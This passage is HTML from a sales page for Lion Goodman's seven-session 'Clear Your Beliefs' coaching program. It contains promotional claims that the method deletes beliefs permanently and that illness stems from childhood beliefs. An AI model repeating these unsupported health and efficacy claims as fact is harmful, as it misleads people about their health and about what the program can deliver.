the basement where they''re stored.\n\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\n\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\n\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\n<ul class="indented-img-left">\n	<li>Why did I say that?</li>\n	<li>What’s wrong with me?</li>\n	<li>Why didn’t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul>\n<em>\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\n\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\n\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\n\n&nbsp;\n<h1>Here’s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\n\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\n\n&nbsp;\n<h1>Imagine The Life You Desire</h1>\n<strong>Can you imagine this?</strong>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\n\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\n\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\n\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\n\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\n\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\n\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\n\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\n\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\n\nIf you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul class="check">\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li>\n</ul>\n</div>\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\nDear Explorer:\nAs a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\n\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\n\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\n\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\n\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\n\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\n\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\n\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\n\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\n\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\n\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\n\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\n\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.\n\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\n\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs...\n\nIn gratitude, and with warm wishes for your total success,\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.\n\nIn this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.\n\nWhat do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.\n\nIf you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today’s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>” \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. \n\nIt’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div 